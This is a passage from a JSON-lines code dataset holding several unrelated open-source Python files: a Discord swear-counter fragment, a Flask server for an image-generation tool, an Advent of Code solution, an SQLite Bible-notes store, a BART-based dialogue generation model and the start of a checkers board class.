self.stats_[msg.author.name][\"sproste slova\"] += count\n except MemberException as e:\n return e\n\n def on_ready(self):\n print('Swear bot running!')\n\n def build_swear_list(self):\n with open(\"../swear/cs\", encoding=\"utf-8\") as cs, \\\n open(\"../swear/en\", encoding=\"utf-8\") as en:\n return cs.read().strip().split(\"\\n\") + \\\n en.read().strip().split(\"\\n\")\n","repo_name":"vojtechjelinek/custom-discord-bot","sub_path":"custom-discord-bot/swear_bot.py","file_name":"swear_bot.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898196785","text":"from flask import Flask\nfrom flask import render_template, request, jsonify, send_from_directory\nfrom synvilla_server import server, getAPI \n#from synvilla_api import SynvillaAPI\nfrom flask import render_template, request, jsonify\napp = Flask(__name__)\nimport os\n\n\nimport threading, logging\n\ndef pmx_server():\n print(\"Thread sdserver starting\")\n server()\n print(\"Thread sdserver finishing\")\n \npmx = threading.Thread(target=server, daemon = True)\npmx.start()\napi = getAPI()\n \n@app.route('/data')\ndef gdataobj():\n d = api.getDataObj()\n d.text = cleant(d.text)\n d.ntext = cleant(d.ntext)\n #print(\"APPo\", d.text)\n d.h = str(d.h)\n d.w = str(d.w)\n d = d.__dict__\n return jsonify(d) \n\ndef cleant(t):\n if t == None:\n t = \"\"\n t = t.replace(\"<\",\"<\").replace(\">\",\">\")\n return t\n\n@app.route('/')\n@app.route('/index')\ndef client():\n return send_from_directory('templates', 'client2b.html')\n \n@app.route('/img')\n@app.route('/client')\ndef img():\n #text, np, i, total, beta, steps, lr, seed, _, _ = getData()\n o = a.getDataObj()\n ifn = 'result.jpg?'+str(i.i)\n #print(o.text, o.i, o.total)\n c = cleant(o.text)+' ('+str(o.i)+ \"/\" + str(o.total)+')'\n html = render_template('img.html', caption=c, ifn=ifn, prompt=o.text)\n return html\n\n \n@app.route('/prompts', methods=['POST'])\ndef prompts():\n #print(\"APP\", request.json)\n text = request.json['prompt'] \n ntext = request.json['nprompt']\n mtext = request.json['mprompt'] \n mntext = request.json['nmprompt'] \n \n #print(\"APP\",text,ntext, mtext, mntext)\n \n api.setText(text, ntext, mtext, mntext)\n return cleant(text) \n \n@app.route('/nexts', methods=['POST'])\ndef nexts():\n text = request.json['prompt'] \n ntext = request.json['nprompt']\n mtext = request.json['mprompt']\n nmtext = request.json['nmprompt']\n #print(\"APP next\",text,ntext, mtext, mntext)\n api.setText(text, ntext, mtext, nmtext)\n os.system(\"cp static/result.jpg startimg.jpg\")\n api.setImg()\n return cleant(text) \n\n@app.route('/reset',methods=['POST'])\ndef reset():\n api.resetLats()\n return \"ok\"\n\n@app.route('/resetmask',methods=['POST'])\ndef resetm():\n api.clearMask()\n return \"ok\"\n \n'''''\n\n@app.route('/resetbmask',methods=['POST'])\ndef resetbm():\n api.resetBMask()\n return \"ok\"\n \n@app.route('/pause',methods=['POST'])\ndef pausef():\n pause()\n return \"ok\"\n\n@app.route('/resume',methods=['POST'])\ndef resumef():\n resume()\n return \"ok\"\n'''\n@app.route('/steps', methods=['POST'])\ndef noise():\n n = request.json['steps']\n api.setSteps(int(n))\n return \"ok\" \n\n@app.route('/beta', methods=['POST'])\ndef beta():\n b = request.json['beta']\n #print(\"APP beta in \",b)\n api.setBeta(float(b))\n return \"ok\" \n\n@app.route('/lr', methods=['POST'])\ndef lrset():\n lr = float(request.json['lr'])\n api.setLR(lr)\n return \"ok\" \n \n@app.route('/noise', methods=['POST'])\ndef enoise():\n n = request.json['noise']\n api.setNoise(float(n))\n return \"ok\" \n\n@app.route('/bgw', methods=['POST'])\ndef bgw():\n n = request.json['bgw']\n api.setBgw(float(n))\n return \"ok\" \n\n@app.route('/fgw', methods=['POST'])\ndef fgw():\n n = request.json['fgw']\n api.setFgw(float(n))\n return \"ok\" \n\n@app.route('/iter', methods=['POST'])\ndef iter():\n it = request.json['iter']\n #api.setIter(int(it))\n return \"ok\" \n\n@app.route('/seed', methods=['POST'])\ndef seed():\n s = request.json['seed']\n api.setSeed(int(s))\n return \"ok\" \n\n@app.route('/seedlock', methods=['POST'])\ndef seedlock():\n s = request.json['lock']\n #api.setLock(int(s))\n return \"ok\" \n\n@app.route('/gamma', methods=['POST'])\ndef gamma():\n g = request.json['gamma']\n api.setGamma(float(g))\n return \"ok\" \n\n@app.route('/contrast', methods=['POST'])\ndef contrast():\n c = request.json['contrast']\n api.setContrast(float(c))\n return \"ok\" \n\n\n@app.route('/blend', methods=['POST'])\ndef blend():\n b = request.json['blend']\n api.setBlend(int(b))\n return \"ok\" \n \n@app.route('/inpaint', methods=['POST'])\ndef inpaint():\n b = request.json['inpaint']\n api.setInpaint(int(b))\n return \"ok\" \n \n@app.route('/startimg',methods=[ 'POST'])\ndef uploadImg():\n isthisFile=request.files.get('file')\n if not isthisFile:\n return \"nok\"\n else:\n print(request) \n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./startimg.jpg\") #+isthisFile.filename) \n api.setImg()\n return \"ok\" \n\n@app.route('/maskimg',methods=[ 'POST'])\ndef uploadMask():\n isthisFile=request.files.get('file')\n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./maskimg.jpg\") #+isthisFile.filename) \n api.setMask()\n return \"ok\" \n\n''''' \n@app.route('/bmask',methods=[ 'POST'])\ndef uploadBMask():\n isthisFile=request.files.get('file')\n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./bmaskimg.jpg\") #+isthisFile.filename) \n #api.setBMask()\n return \"ok\"\n'''\n \n@app.route('/settings', methods=['POST'])\ndef settings():\n h = request.json['h']\n w = request.json['w']\n m = request.json['model']\n s = request.json['sched']\n api.setSettings(int(h), int(w), m, s)\n return \"ok\" \n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n\n\n","repo_name":"htoyryla/synvilla","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5972040736","text":"def day_4(input): \n with open(input, 'r') as f:\n sum_1 = 0\n sum_2 = 0\n for line in f.readlines():\n one, two = line.strip().split(',')\n range_1 = set(range(int(one.split('-')[0]), int(one.split('-')[1]) + 1))\n range_2 = set(range(int(two.split('-')[0]), int(two.split('-')[1]) + 1))\n union = range_1.union(range_2)\n if union == range_1 or union == range_2:\n sum_1 += 1\n\n if len(range_1.intersection(range_2)) > 0:\n sum_2 += 1\n\n return (sum_1, sum_2)\n\n\n\nif __name__ == '__main__':\n input = \"2022/inputs/day4/input.txt\"\n one, two = day_4(input)\n print(f\"Part 1: {one}\")\n print(f\"Part 2: {two}\")","repo_name":"slotruglio/aoc","sub_path":"2022/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166772585","text":"import os, re, apsw, config\nfrom util.BibleVerseParser import BibleVerseParser\nfrom util.DateUtil import DateUtil\nfrom util.TextUtil import TextUtil\n\n\nclass NoteSqlite:\n\n def __init__(self):\n # connect the note file specified in config.py > config.bibleNotes\n self.database = os.path.join(config.marvelData, config.bibleNotes)\n self.connection = apsw.Connection(self.database)\n #self.connection.setbusytimeout(500)\n self.cursor = self.connection.cursor()\n create = (\n \"CREATE TABLE IF NOT EXISTS BookNote (Book INT, Note TEXT)\",\n \"CREATE TABLE IF NOT EXISTS ChapterNote (Book INT, Chapter INT, Note TEXT)\",\n \"CREATE TABLE IF NOT EXISTS VerseNote (Book INT, Chapter INT, Verse INT, Note TEXT)\",\n )\n for statement in create:\n self.cursor.execute(statement)\n if not self.checkColumnExists(\"ChapterNote\", \"Updated\"):\n self.addColumnToTable(\"ChapterNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"ChapterNote\", \"GistId\", \"NVARCHAR(40)\")\n if not self.checkColumnExists(\"VerseNote\", \"Updated\"):\n self.addColumnToTable(\"VerseNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"VerseNote\", \"GistId\", \"NVARCHAR(40)\")\n if not self.checkColumnExists(\"BookNote\", \"Updated\"):\n self.addColumnToTable(\"BookNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"BookNote\", \"GistId\", \"NVARCHAR(40)\")\n# #self.cursor.execute(\"COMMIT\")\n\n def __del__(self):\n self.connection.close()\n\n def getBookNote(self, b):\n query = \"SELECT Note, Updated FROM BookNote WHERE Book=?\"\n self.cursor.execute(query, (b,))\n content = self.cursor.fetchone()\n if content:\n return content\n else:\n return config.thisTranslation[\"empty\"], 0\n\n def getChapterNote(self, b, c):\n query = \"SELECT Note, Updated FROM ChapterNote WHERE Book=? AND Chapter=?\"\n self.cursor.execute(query, (b, c))\n content = self.cursor.fetchone()\n if content:\n return content\n else:\n return config.thisTranslation[\"empty\"], 0\n\n def getVerseNote(self, b, c, v):\n query = \"SELECT Note, Updated FROM VerseNote WHERE Book=? AND Chapter=? AND Verse=?\"\n self.cursor.execute(query, (b, c, v))\n content = self.cursor.fetchone()\n if content:\n return content\n else:\n return config.thisTranslation[\"empty\"], 0\n\n def displayBookNote(self, b):\n content, updated = self.getBookNote(b)\n #content = self.customFormat(content)\n content = self.highlightSearch(content)\n return content, updated\n\n def displayChapterNote(self, b, c):\n content, updated = self.getChapterNote(b, c)\n #content = self.customFormat(content)\n content = self.highlightSearch(content)\n return content, updated\n\n def displayVerseNote(self, b, c, v):\n content, updated = self.getVerseNote(b, c, v)\n #content = self.customFormat(content)\n content = self.highlightSearch(content)\n return content, updated\n\n def isNotEmptyNote(self, text):\n p = re.compile(\"<body[^<>]*?>[ \\r\\n
]*?<p[^<>]*?>[ \\r\\n
]*?<br />[ \\r\\n
]*?</p>[ \\r\\n
]*?</body>[ \\r\\n
]*?</html>\", flags=re.M)\n if p.search(text):\n return False\n else:\n return True\n\n def saveBookNote(self, b, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM BookNote WHERE Book=?\"\n self.cursor.execute(delete, (b,))\n# self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO BookNote (Book, Note, Updated) VALUES (?, ?, ?)\"\n self.cursor.execute(insert, (b, note, updated))\n# self.cursor.execute(\"COMMIT\")\n\n def saveChapterNote(self, b, c, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM ChapterNote WHERE Book=? AND Chapter=?\"\n self.cursor.execute(delete, (b, c))\n# self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO ChapterNote (Book, Chapter, Note, Updated) VALUES (?, ?, ?, ?)\"\n self.cursor.execute(insert, (b, c, note, updated))\n# self.cursor.execute(\"COMMIT\")\n\n def setBookNoteUpdate(self, b, c, updated):\n update = \"UPDATE BookNote set Updated=? WHERE Book=?\"\n self.cursor.execute(update, (updated, b))\n# self.cursor.execute(\"COMMIT\")\n\n def setChapterNoteUpdate(self, b, c, updated):\n update = \"UPDATE ChapterNote set Updated=? WHERE Book=? and Chapter=?\"\n self.cursor.execute(update, (updated, b, c))\n# self.cursor.execute(\"COMMIT\")\n\n def setChapterNoteContent(self, b, c, content, updated):\n update = \"UPDATE ChapterNote set Note=?, Updated=? WHERE Book=? and Chapter=?\"\n self.cursor.execute(update, (content, updated, b, c))\n# self.cursor.execute(\"COMMIT\")\n\n def saveVerseNote(self, b, c, v, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM VerseNote WHERE Book=? AND Chapter=? AND Verse=?\"\n self.cursor.execute(delete, (b, c, v))\n# #self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO VerseNote (Book, Chapter, Verse, Note, Updated) VALUES (?, ?, ?, ?, ?)\"\n self.cursor.execute(insert, (b, c, v, note, updated))\n# #self.cursor.execute(\"COMMIT\")\n\n def setVerseNoteUpdate(self, b, c, v, updated):\n update = \"UPDATE VerseNote set Updated = ? WHERE Book=? and Chapter=? and Verse=?\"\n self.cursor.execute(update, (updated, b, c, v))\n# self.cursor.execute(\"COMMIT\")\n\n def setVerseNoteContent(self, b, c, v, content, updated):\n update = \"UPDATE VerseNote set Note=?, Updated=? WHERE Book=? and Chapter=? and Verse=?\"\n self.cursor.execute(update, (content, updated, b, c, v))\n# self.cursor.execute(\"COMMIT\")\n \n def getSearchedBookList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book FROM BookNote WHERE Note LIKE ? ORDER BY Book\"\n self.cursor.execute(query, (searchString,))\n standardAbbreviation = BibleVerseParser(config.parserStandarisation).standardAbbreviation\n return [\"<ref onclick='document.title=\\\"_openbooknote:::{0}\\\"'>{1}</ref>\".format(book[0], standardAbbreviation[str(book[0])]) for book in self.cursor.fetchall()]\n\n def getSearchedChapterList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book, Chapter FROM ChapterNote WHERE Note LIKE ? ORDER BY Book, Chapter\"\n self.cursor.execute(query, (searchString,))\n parser = BibleVerseParser(config.parserStandarisation)\n return [\"<ref onclick='document.title=\\\"_openchapternote:::{0}.{1}\\\"'>{2}</ref>\".format(book, chapter, parser.bcvToVerseReference(book, chapter, 1)[:-2]) for book, chapter in self.cursor.fetchall()]\n\n def getSearchedVerseList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book, Chapter, Verse FROM VerseNote WHERE Note LIKE ? ORDER BY Book, Chapter, Verse\"\n self.cursor.execute(query, (searchString,))\n parser = BibleVerseParser(config.parserStandarisation)\n return [\"<ref onclick='document.title=\\\"_openversenote:::{0}.{1}.{2}\\\"'>{3}</ref>\".format(book, chapter, verse, parser.bcvToVerseReference(book, chapter, verse)) for book, chapter, verse in self.cursor.fetchall()]\n\n def getChapterVerseList(self, b, c):\n query = \"SELECT DISTINCT Verse FROM VerseNote WHERE Book=? AND Chapter=? ORDER BY Verse\"\n self.cursor.execute(query, (b, c))\n return [verse[0] for verse in self.cursor.fetchall()]\n\n def isBookNote(self, b):\n query = \"SELECT DISTINCT Book FROM BookNote WHERE Book=?\"\n self.cursor.execute(query, (b,))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def isChapterNote(self, b, c):\n query = \"SELECT DISTINCT Chapter FROM ChapterNote WHERE Book=? AND Chapter=?\"\n self.cursor.execute(query, (b, c))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def highlightSearch(self, content):\n highlight = config.noteSearchString\n if highlight and not highlight == \"z\":\n content = re.sub(\"(\"+highlight+\")\", r\"<z>\\1</z>\", content, flags=re.IGNORECASE)\n content = TextUtil.fixTextHighlighting(content)\n # add an id so as to scroll to the first result\n content = re.sub(\"<z>\", \"<span id='v{0}.{1}.{2}'></span><z>\".format(config.studyB, config.studyC, config.studyV), content, count=1)\n return content\n\n def getAllBooks(self):\n query = \"SELECT Book, 0, 0, Note, Updated FROM BookNote ORDER BY Book\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getAllChapters(self):\n query = \"SELECT Book, Chapter, 0, Note, Updated FROM ChapterNote ORDER BY Book, Chapter\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getAllVerses(self):\n query = \"SELECT Book, Chapter, Verse, Note, Updated FROM VerseNote ORDER BY Book, Chapter, Verse\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getBookCount(self):\n query = \"SELECT count(*) FROM BookNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def getChapterCount(self):\n query = \"SELECT count(*) FROM ChapterNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def getVerseCount(self):\n query = \"SELECT count(*) FROM VerseNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def deleteAllNotes(self):\n self.deleteBookNotes()\n self.deleteChapterNotes()\n self.deleteVerseNotes()\n\n def deleteBookNotes(self):\n self.cursor.execute(\"DELETE FROM BookNote\")\n# self.cursor.execute(\"COMMIT\")\n\n def deleteChapterNotes(self):\n self.cursor.execute(\"DELETE FROM ChapterNote\")\n# self.cursor.execute(\"COMMIT\")\n\n def deleteVerseNotes(self):\n self.cursor.execute(\"DELETE FROM VerseNote\")\n# self.cursor.execute(\"COMMIT\")\n\n def checkColumnExists(self, table, column):\n self.cursor.execute(\"SELECT * FROM pragma_table_info(?) WHERE name=?\", (table, column))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def addColumnToTable(self, table, column, column_type):\n sql = \"ALTER TABLE \" + table + \" ADD COLUMN \" + column + \" \" + column_type\n self.cursor.execute(sql)\n\n\n# Only used for test\n\n# def test_deleteAllNotes():\n# ns = NoteSqlite()\n# ns.deleteAllNotes()\n\ndef test_printAllCount():\n ns = NoteSqlite()\n print(\"Books: {0}\".format(ns.getBookCount()))\n print(\"Chapters: {0}\".format(ns.getChapterCount()))\n print(\"Verses: {0}\".format(ns.getVerseCount()))\n\nif __name__ == \"__main__\":\n\n test_printAllCount()\n\n\n","repo_name":"eliranwong/UniqueBible","sub_path":"db/NoteSqlite.py","file_name":"NoteSqlite.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"40536891760","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss\nimport torch.nn.functional as F\n\nimport warnings\n\nfrom transformers.modeling_bart import (\n BartModel,\n BartDecoder,\n BartForConditionalGeneration,\n _prepare_bart_decoder_inputs,\n shift_tokens_right,\n BaseModelOutput,\n Seq2SeqModelOutput,\n Seq2SeqLMOutput\n)\n\nfrom dataloaders import MAX_UTTERANCE_NUM, MAX_SPEAKER_NUM\nfrom models.HGT import bart_modify\n\nclass TXHModel(BartModel):\n def __init__(self, config, args):\n super(BartModel, self).__init__(config)\n\n padding_idx, vocab_size = config.pad_token_id, config.vocab_size\n self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)\n\n self.encoder = bart_modify.TXHEncoder(config, self.shared, args)\n self.decoder = BartDecoder(config, self.shared)\n\n self.ans_embeddings = nn.Embedding(3, config.d_model)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids,\n graph,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n encoder_outputs=None,\n decoder_ans_idxs=None,\n decoder_ans_from=None,\n past_key_values=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **kwargs,\n ):\n if \"decoder_past_key_values\" in kwargs:\n warnings.warn(\n \"The `decoder_past_key_values` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = kwargs.pop(\"decoder_past_key_values\")\n\n if decoder_input_ids is None:\n use_cache = False\n\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n # make masks if user doesn't supply\n if not use_cache:\n decoder_input_ids, decoder_padding_mask, causal_mask = _prepare_bart_decoder_inputs(\n self.config,\n input_ids,\n decoder_input_ids=decoder_input_ids,\n decoder_padding_mask=decoder_attention_mask,\n causal_mask_dtype=self.shared.weight.dtype,\n )\n else:\n decoder_padding_mask, causal_mask = None, None\n\n assert decoder_input_ids is not None\n\n if encoder_outputs is None:\n encoder_outputs = self.encoder(\n graph=graph,\n input_ids=input_ids,\n attention_mask=attention_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=False\n elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):\n encoder_outputs = BaseModelOutput(\n last_hidden_state=encoder_outputs[0],\n hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,\n attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,\n )\n\n # deal with NAN for invaild example. \n # encoder_outputs[0][encoder_outputs[0].isnan()] = 0.0\n encoder_output_embeddings = encoder_outputs[0].reshape(-1, MAX_UTTERANCE_NUM*encoder_outputs[0].shape[1], encoder_outputs[0].shape[2])\n \n ans_total = torch.zeros(encoder_outputs[0].shape[0], dtype=decoder_ans_idxs.dtype, device=decoder_ans_idxs.device).view(-1, MAX_UTTERANCE_NUM)\n ans_total = ans_total.scatter_add(dim=1, index=decoder_ans_idxs.unsqueeze(1), src=torch.ones_like(ans_total)+1).scatter_add(dim=1, index=decoder_ans_from.unsqueeze(1), src=torch.ones_like(ans_total))\n ans_embeddings = self.ans_embeddings(ans_total).unsqueeze(2).repeat(1, 1, encoder_outputs[0].shape[1], 1).view_as(encoder_output_embeddings)\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n decoder_outputs = self.decoder(\n decoder_input_ids,\n encoder_output_embeddings + ans_embeddings,\n attention_mask.reshape(-1, MAX_UTTERANCE_NUM*attention_mask.shape[1]) if attention_mask is not None else None,\n decoder_padding_mask,\n decoder_causal_mask=causal_mask,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n if not return_dict:\n return decoder_outputs + encoder_outputs\n\n return Seq2SeqModelOutput(\n last_hidden_state=decoder_outputs.last_hidden_state,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n encoder_hidden_states=encoder_outputs.hidden_states,\n encoder_attentions=encoder_outputs.attentions,\n )\n\n\nclass TXHGenerationModel(BartForConditionalGeneration):\n\n def __init__(self, config, args):\n super(BartForConditionalGeneration, self).__init__(config)\n base_model = TXHModel(config, args)\n self.model = base_model\n self.register_buffer(\"final_logits_bias\", torch.zeros((1, self.model.shared.num_embeddings)))\n\n def forward(\n self,\n input_ids,\n graph=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n labels=None,\n decoder_ans_idxs=None,\n decoder_ans_from=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **unused,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,\n config.vocab_size]`` or -100 (see ``input_ids`` docstring). Tokens with indices set to ``-100`` are ignored\n (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.\n\n Returns:\n\n Conditional generation example::\n\n >>> # Mask filling only works for bart-large\n >>> from transformers import BartTokenizer, BartForConditionalGeneration\n >>> tokenizer = BartTokenizer.from_pretrained('facebook/bart-large')\n >>> TXT = \"My friends are <mask> but they eat too many carbs.\"\n\n >>> model = BartForConditionalGeneration.from_pretrained('facebook/bart-large')\n >>> input_ids = tokenizer([TXT], return_tensors='pt')['input_ids']\n >>> logits = model(input_ids).logits\n\n >>> masked_index = (input_ids[0] == tokenizer.mask_token_id).nonzero().item()\n >>> probs = logits[0, masked_index].softmax(dim=0)\n >>> values, predictions = probs.topk(5)\n\n >>> tokenizer.decode(predictions).split()\n >>> # ['good', 'great', 'all', 'really', 'very']\n \"\"\"\n if \"lm_labels\" in unused:\n warnings.warn(\n \"The `lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.\",\n FutureWarning,\n )\n labels = unused.pop(\"lm_labels\")\n if \"decoder_cached_states\" in unused:\n warnings.warn(\n \"The `decoder_cached_states` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = unused.pop(\"decoder_cached_states\")\n if \"decoder_past_key_values\" in unused:\n warnings.warn(\n \"The `decoder_past_key_values` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = unused.pop(\"decoder_past_key_values\")\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n if labels is not None:\n use_cache = False\n if decoder_input_ids is None:\n decoder_input_ids = shift_tokens_right(labels, self.config.pad_token_id)\n\n outputs = self.model(\n input_ids,\n graph,\n attention_mask=attention_mask,\n decoder_input_ids=decoder_input_ids,\n encoder_outputs=encoder_outputs,\n decoder_attention_mask=decoder_attention_mask,\n decoder_ans_idxs=decoder_ans_idxs,\n decoder_ans_from=decoder_ans_from,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n lm_logits = F.linear(outputs[0], self.model.shared.weight, bias=self.final_logits_bias)\n\n masked_lm_loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n # TODO(SS): do we need to ignore pad tokens in labels?\n masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output\n\n return Seq2SeqLMOutput(\n loss=masked_lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n decoder_hidden_states=outputs.decoder_hidden_states,\n decoder_attentions=outputs.decoder_attentions,\n cross_attentions=outputs.cross_attentions,\n encoder_last_hidden_state=outputs.encoder_last_hidden_state,\n encoder_hidden_states=outputs.encoder_hidden_states,\n encoder_attentions=outputs.encoder_attentions,\n )\n \n \n def prepare_inputs_for_generation(\n self, decoder_input_ids, past=None, attention_mask=None, use_cache=None, encoder_outputs=None, graph=None, decoder_ans_idxs=None, decoder_ans_from=None, **kwargs\n ):\n return {\n \"input_ids\": None, # encoder_outputs is defined. input_ids not needed\n \"graph\": graph,\n \"encoder_outputs\": encoder_outputs,\n \"past_key_values\": past,\n \"decoder_input_ids\": decoder_input_ids,\n \"attention_mask\": attention_mask,\n \"decoder_ans_idxs\": decoder_ans_idxs,\n \"decoder_ans_from\": decoder_ans_from,\n \"use_cache\": use_cache, # change this to avoid caching (presumably for debugging)\n }\n\n def _prepare_decoder_input_ids_for_generation(\n self, input_ids: torch.LongTensor, decoder_start_token_id: int = None, bos_token_id: int = None, **model_kwargs\n ) -> torch.LongTensor:\n\n if \"decoder_input_ids\" in model_kwargs:\n return model_kwargs[\"decoder_input_ids\"]\n\n decoder_start_token_id = self._get_decoder_start_token_id(decoder_start_token_id, bos_token_id)\n decoder_input_ids = (\n torch.ones((input_ids.shape[0]//MAX_UTTERANCE_NUM, 1), dtype=input_ids.dtype, device=input_ids.device)\n * decoder_start_token_id\n )\n return decoder_input_ids","repo_name":"lxchtan/HeterMPC","sub_path":"models/heterbart.py","file_name":"heterbart.py","file_ext":"py","file_size_in_byte":11132,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34991798391","text":"class Piece:\n\t\t\n\t\tdef __init__(self,piece_color,piece_type):\n\t\t\t\n\t\t\tif piece_color in ('B','W'):\n\t\t\t\tself.piece_color=piece_color\n\t\t\t\t\n\t\t\t\tif piece_color=='B':\n\t\t\t\t\tself.disp_col='\\033[1;34m'\n\t\t\t\t\t\n\t\t\t\telif piece_color=='W':\n\t\t\t\t\tself.disp_col='\\033[1;37m'\n\t\t\t\t\t\n\t\t\telse: \n\t\t\t\traise NameError('Piece color has to be B or W')\n\t\t\t\n\t\t\tif piece_type in ('P','Q'):\n\t\t\t\tself.piece_type=piece_type\n\t\t\telse:\n\t\t\t\traise NameError('Piece type has to be P or Q')\t\t\t\n\n\nclass Board:\n\n \n\tdef __init__(self,game_version):\n\t\tself.game_version=game_version\n\t\t\n\t\tif game_version=='International':\n\t\t\tself.grid= [['.'] * 10 for i in range(10)]\n\t\t\tself.size_b=10\n\t\n\t\telif game_version in ('British','American','Russian'):\n\t\t\tself.grid=[['.'] * 8 for i in range(8)]\t\n\t\t\tself.size_b=8\n \n\t\telse:\n\t\t\traise NameError('Incorrect version specified: must be American, British, Russian or International')\n\t\t\n\t\t\n\t\t\t\n\tdef display_grid(self):\n\t\tcol_numerals=[str(i) for i in range(0,self.size_b)]\n\t\t\n\t\tprint(' '+ ' '.join(col_numerals)) \n\t\t\t\n\t\tticker=0\n \n\t\tfor line in self.grid:\n\t\t\tprint(ticker,end='')\n\t\t\t\n\t\t\tticker+=1\n\t\t\t\n\t\t\tfor obj in line:\n\t\t\t\tif isinstance(obj,str) and obj=='.': \n\t\t\t\t\tprint('|'+obj,end='')\n\t\t\t\t\t\n\t\t\t\telif isinstance(obj,Piece):\n\t\t\t\t\tprint('|'+ obj.disp_col + obj.piece_type + '\\033[0m',end='') \n\t\t\t\t\n\t\t\t\telse: \n\t\t\t\t\traise NameError('Unidentified piece spotted') \n\t\t\t\n\t\t\tprint('|')\n\t\n\t\tprint('\\n') \n\t\n\t\n\tdef valid_coord(self,coordinate):\n\t\t\n\t\treturn coordinate<self.size_b and coordinate>=0 and isinstance(coordinate,int)\n\t\n\tdef add_piece(self,piece,coord1,coord2):\n\t\tif self.valid_coord(coord1) and self.valid_coord(coord2):\n\t\t\t\n\t\t\tif isinstance(piece,Piece):\n\t\t\t\t\n\t\t\t\tif 